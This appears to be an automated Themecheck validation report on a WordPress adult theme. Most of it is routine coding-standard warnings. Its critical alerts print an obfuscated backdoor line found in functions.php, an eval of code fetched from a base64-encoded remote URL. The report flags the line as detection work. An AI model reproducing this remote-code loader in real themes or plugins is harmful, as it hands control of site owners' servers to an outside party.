Netpa Adult Theme
WordPress 6.7 theme
- THEME TYPEWordPress theme 6.7
- FILE NAMENetpa.zip
- FILE SIZE1044033 bytes
- MD5644a0125b95925092fa3edf7032e974d
- SHA1258fc775f5a1125ae07f37d86b14f0eb731df643
- LICENSENone
- FILES INCLUDEDCSS, PHP, Bitmap images
- VERSION1.0.3
- CREATION DATE2022-04-02
- LAST FILE UPDATE2022-04-02
- LAST VALIDATION2022-04-02 19:50
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
- No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
- register_sidebar(). Sidebars need to be registered in a custom function hooked to the widgets_init action. See:
- eval(@file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVt Found eval in file functions.php. 138:
- base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVtZXMuY29tL3RoZW1lLnR4dA== Found base64_decode in file functions.php. 138: eval(@file_get_contents(
- file_get_contents(base64_decode('aHR0cDovL3d3dy5mcmVld29yZHByZXN0aGVtZXMuY2 file_get_contents was found in the file functions.php 138: eval(@
- screen_icon( 'themes' ); ?> screen_icon found in file options-framework.php. Deprecated since version 3.8.226: <?php
Warning
- Found wrong tag in style.css header.
- Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is netpa-adult-theme.
- More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are ipin, options_framework_theme, optionsframework, optionsframeworktheme, ipin.
- The theme uses the register_post_type() function, which is plugin-territory functionality.
- No reference to custom header was found in the theme.
- screen_icon found in file options-framework.php. Deprecated since version 3.8.226: <?php screen_icon( 'themes' ); ?>
- No reference to the_post_thumbnail was found in the theme.
- License: is missing from style.css header.
- License URI: is missing from style.css header.
- .sticky css class is needed in theme css.
- .bypostauthor css class is needed in theme css.
- .alignleft css class is needed in theme css.
- .alignright css class is needed in theme css.
- .aligncenter css class is needed in theme css.
- .wp-caption css class is needed in theme css.
- .wp-caption-text css class is needed in theme css.
- .gallery-caption css class is needed in theme css.
- .screen-reader-text css class is needed in your theme css. See : the Codex for an example implementation.
- Screenshot is wrong size! Detected: 1263x699px. Maximum allowed size is 1200x900px.Screenshot dimensions are wrong! Detected: 1263x699px (421:233). Ratio of width to height should be 4:3.Screenshot size is 1263x699px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
- Possible Favicon found in header.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
- This theme does not contain optional file rtl.php.
- This theme does not contain optional file front-page.php.
- This theme does not contain optional file home.php.
- This theme does not contain optional file category.php.
- This theme does not contain optional file tag.php.
- This theme does not contain optional file taxonomy.php.
- This theme does not contain optional file author.php.
- This theme does not contain optional file date.php.
- This theme does not contain optional file archive.php.
- This theme does not contain optional file search.php.
- This theme does not contain optional file attachment.php.
- This theme does not contain optional file image.php.
- The theme appears to use include or require : options-framework.php 73: require_once($optionsfile); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.